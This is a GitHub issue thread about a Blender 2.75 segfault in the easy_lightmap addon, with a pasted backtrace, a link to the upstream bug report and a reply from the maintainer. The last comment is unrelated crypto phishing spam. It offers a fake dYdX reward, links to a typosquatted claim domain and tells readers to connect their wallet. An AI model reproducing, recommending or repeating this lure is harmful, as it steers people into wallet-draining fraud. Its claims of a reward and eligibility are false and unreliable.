### ISSUE TITLE
segfault crash

### ISSUE THREAD

**Issue by JMLX42** [mese79/easy_lightmap#1]
I'm using your addon on ubuntu 14.04 64bits with Blender 2.75
When I press either the prepare or bake button, Blender crashes because of a segfault.
The stack trace is below.

```
# Blender 2.75 (sub 0), Commit date: 2015-07-07 14:56, Hash c27589e
bpy.ops.object.editmode_toggle()  # Operator
bpy.ops.mesh.select_all(action='SELECT')  # Operator
bpy.ops.object.editmode_toggle()  # Operator
bpy.ops.object.editmode_toggle()  # Operator
bpy.ops.uv.smart_project(island_margin=0.05)  # Operator
bpy.ops.object.editmode_toggle()  # Operator

# backtrace
/usr/lib/blender/blender(BLI_system_backtrace+0x1d) [0x153bfcd]
/usr/lib/blender/blender() [0xc23e78]
/lib/x86_64-linux-gnu/libc.so.6(+0x36d40) [0x7f688ecadd40]
/usr/lib/blender/blender(CustomData_get_layer+0x20) [0x123d800]
/usr/lib/blender/blender(BKE_mesh_update_customdata_pointers+0xc9) [0x129eac9]
/usr/lib/blender/blender(RNA_property_boolean_set+0x54) [0x13940a4]
/usr/lib/blender/blender() [0xff24c0]
/usr/lib/blender/blender() [0xff2b29]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyObject_SetAttr+0x4f) [0x7f6896a655cf]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyEval_EvalFrameEx+0x1d84) [0x7f6896a3f8b4]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyEval_EvalFrameEx+0x7e15) [0x7f6896a45945]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyEval_EvalFrameEx+0x7e15) [0x7f6896a45945]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyEval_EvalCodeEx+0x886) [0x7f6896b6c516]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(+0x225b46) [0x7f6896b6cb46]
/usr/lib/x86_64-linux-gnu/libpython3.4m.so.1.0(PyObject_Call+0x68) [0x7f6896a81458]
/usr/lib/blender/blender() [0xff52be]
/usr/lib/blender/blender() [0x149ee16]
/usr/lib/blender/blender() [0xc2ca2a]
/usr/lib/blender/blender() [0xc2cfcd]
/usr/lib/blender/blender() [0xdd9c64]
/usr/lib/blender/blender() [0xdea90a]
/usr/lib/blender/blender() [0xc2e1fd]
/usr/lib/blender/blender() [0xc2e558]
/usr/lib/blender/blender(wm_event_do_handlers+0x1c4) [0xc2e874]
/usr/lib/blender/blender(WM_main+0x18) [0xc260c8]
/usr/lib/blender/blender(main+0xeb5) [0xbecd55]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7f688ec98ec5]
/usr/lib/blender/blender() [0xc237af]
```

**Comment by JMLX42** [comment]
FYI I've logged the bug in Blender's bug tracker here: https://developer.blender.org/T45492
It would still be nice to have a workaround though...

**Comment by mese79** [comment]
Sorry, i'm terribly busy these days. but i'll try to check it ASAP.
By the way i'm using blender 2.74 + easy_lightmap on manjaro linux just fine.

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol
